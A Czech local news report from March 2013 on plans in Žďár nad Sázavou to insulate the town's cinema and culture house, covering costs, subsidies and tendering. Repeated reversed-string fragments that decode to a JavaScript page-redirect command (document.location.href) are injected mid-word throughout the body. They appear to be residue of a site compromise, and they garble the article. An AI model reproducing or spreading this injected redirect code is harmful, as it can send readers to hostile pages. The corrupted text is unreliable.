Žďár nad Sázavou, zdar nad sazavou, aktuality, zateplení, kino, dům kultury
Rainbow page separator

Ve Žďáře chtějí zateplit kino i Dům kultury

Pátek, 29. března 2013

Žďár nad Sázavou / Zateplit Dům kultury a Kino Vysočina chtějí nechat zástupci Žďáru nad Sázavou. Slibují si od [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho výraznou úsporu při vytápění obou objektů. Náklady na zateplení obou nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí si celkem vyžádají asi 43,4 milionů korun bez DPH. Žďárští požádali o dotaci, zatím ještě neví, zda uspěli. Vyhlásili rovněž výběrové řízení na dodavatele obou staveb.

Se zateplováním kina by se tak mohlo začít v květnu, ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovo by bylo v září, co se Domu kultury týče, tam by se zateplovalo od června do prosince. Na kino by bylo potřeba 6,4 milionu s podílem Žďáru ve výši 3,5 milionu korun, Dům kultury by se zrevitalizoval za 37 milionů korun, přičemž podíl města by činil asi 23 milionů.

Peníze na spoluúčast Žďárští mají ve formě úspor ve Fondu správy aktiv, navíc počítají, že v rámci výběrového řízení se podaří snížit cenu. „Například most na Klafar jsme rozpoč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali na 115 milionů korun, pak jsme ho vysoutěžili za 81 milionů, oprava Moučkova domu měla stát 12 milionů, vysoutěžili jsme ji ale za 6,5 milionu korun. I rekonstrukce au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusového nádraží měla původně být za 20 milionů, ale nakonec vyšla jen na 8,9 milionu,“ vyjádřil se žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Jaromír Brychta. Pokud však Žďárští očekávané dotační peníze nezískají, do zateplování se zatím pouštět nebudou.